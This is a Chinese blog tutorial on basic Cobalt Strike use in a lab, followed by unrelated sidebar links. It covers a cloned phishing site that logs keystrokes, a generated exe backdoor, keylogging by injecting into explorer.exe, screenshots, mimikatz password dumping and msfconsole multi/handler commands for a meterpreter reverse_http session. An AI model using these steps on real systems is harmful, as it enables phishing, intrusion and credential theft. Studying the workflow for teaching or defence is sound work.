当前位置:网站首页>『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole
『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole
2022-06-24 03:55:00 【Ho1aAs】
文章目录
本实验在安全隔离环境中运行
仅供教学使用
环境
- kali:Cobalt Strike4.3,192.168.225.129
- winxp:192.168.225.130
配置cs
启动cs服务器
首先给cs文件夹权限
chmod -R 777 ./cobaltstrike4.3
启动cs服务器,teamserver ip password,自定义密码,ip填公网/局域网,不可填127.0.0.1

默认端口50050
登录客户端
sh ./start.sh
这里由于直接在服务器上面开客户端,所以可以填127.0.0.1,最好还是填局域网IP

网页钓鱼
选择克隆网站

克隆目标网站作为钓鱼,勾选记录键盘

靶机访问并输入文字

即可截获输入内容

靶机渗透
创建Listener
先创建监听器

add一个http监听器,host选择客户端ip
Beacon为内置的Listener,获取shell到CS上,Foreign为外部结合的Listener,常用于MSF的结合

创建成功

生成后门
攻击package有四种

- hta
- office宏
- 自定义payload
- exe
演示选择exe,配置对应监听器,然后创建32位的exe

保存到桌面即可

如果是hta,运行mshta URL即可
靶机上线
这一步模拟受害者下载恶意exe
*python文件服务器
在桌面运行
python3 -m http.server 8010

靶机访问,点击运行

即可触发cs上线
cs自带文件服务器
方便一点,选择文件服务器钓鱼

选中生成的后门,然后修改一个名字
靶机访问url,点击运行

触发cs上线

修改sleep时间
默认60秒靶机向服务端发包告知存活情况,为了是隐藏自己,并获取一次需要执行的命令,执行渗透要把这个时间缩短才能很好地拿到回显

改小一点就行,演示改成1s

读取目录


进程注入记录键盘输入
靶机开启一个浏览器

cs浏览进程

注入explore.exe,并点击log ketstrokes记录键盘

注入成功后会有新的进程上线,还是跟上面一样别忘了上线后把sleep调小

靶机在浏览器输入字符,cs键盘记录窗口收到输入的字符

截图

打开截图窗口即可看到

mimikatz获取密码

Cobalt Strike联动msfconsole
首先保证cs上线

创建一个foreign http监听器,ip填公网/局域网,端口弄一个不常用的

然后cs客户端启动msf,这里ip可以填127
msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit
相当于靶机的请求通过监听器传到了msf

配置靶机生成请求

选择msf的监听器

等一下即可

插件安装
用梼杌的插件,解压后load cna文件
邮件上线机器即可

参考
https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/125388547
版权声明:本文为原创,转载时须注明出处及本声明
边栏推荐
- Library management backstage
- How to file ECS? What should be paid attention to when selecting ECS
- web渗透测试----5、暴力破解漏洞--(9)MS-SQL密码破解
- Specificity and correlation of Worthington deoxyribonuclease I
- 重新认识WorkPlus,不止IM即时通讯,是企业移动应用管理专家
- Introduction à la méthode de descente par Gradient - document d'apprentissage automatique pour les programmeurs de chevaux noirs
- Summary of Android interview questions in 2020 (intermediate)
- 由浅入深的混合精度训练教程
- 华为云GaussDB(for Redis)揭秘第19期:GaussDB(for Redis)全面对比Codis
- web渗透测试----5、暴力破解漏洞--(5)SMB密码破解
猜你喜欢

大一下学期期末总结(补充知识漏洞)

How can the new generation of HTAP databases be reshaped in the cloud? Tidb V6 online conference will be announced soon!

apipost接口断言详解

SAP MTS/ATO/MTO/ETO专题之十:ETO模式 Q+空模式 未估价库存 策略自定义

梯度下降法介绍-黑马程序员机器学习讲义

TCPIP协议详解

ServiceStack. Source code analysis of redis (connection and connection pool)

Clang code coverage detection (pile insertion technology)

Idea creates a servlet and accesses the 404 message

15+ urban road element segmentation application, this segmentation model is enough
随机推荐
What are the differences between ECs and virtual hosts? Which is better, ECS or VM?
Physicochemical properties and specificity of Worthington trypsin
C语言自定义类型的介绍(结构体,枚举,联合体,位段)
Easyanticheat uses to inject unsigned code into a protected process (1)
Detailed explanation of tcpip protocol
梯度下降法介绍-黑马程序员机器学习讲义
What is Ping? How can the server disable Ping?
web渗透测试----5、暴力破解漏洞--(9)MS-SQL密码破解
What is the role of ECS? How does FTP connect to ECS configuration?
Facebook internal announcement: instant messaging will be re integrated
How does ECS select bandwidth? What types of servers do you usually have?
Changjiang Dayong, director of openeuler community: jointly promote the new open source model of Euler and jointly build a new open source system
Abnova荧光原位杂交(FISH)探针解决方案
Clang code coverage detection (pile insertion technology)
How are ECS leased? Can the ECS use VPN?
一文简述:供应链攻击知多少
Multi task video recommendation scheme, baidu engineers' actual combat experience sharing
什么是数据中台
博士申请 | 香港科技大学(广州)刘浩老师招收数据挖掘方向全奖博士/硕士
mini-Web框架:装饰器方式的添加路由 | 黑马程序员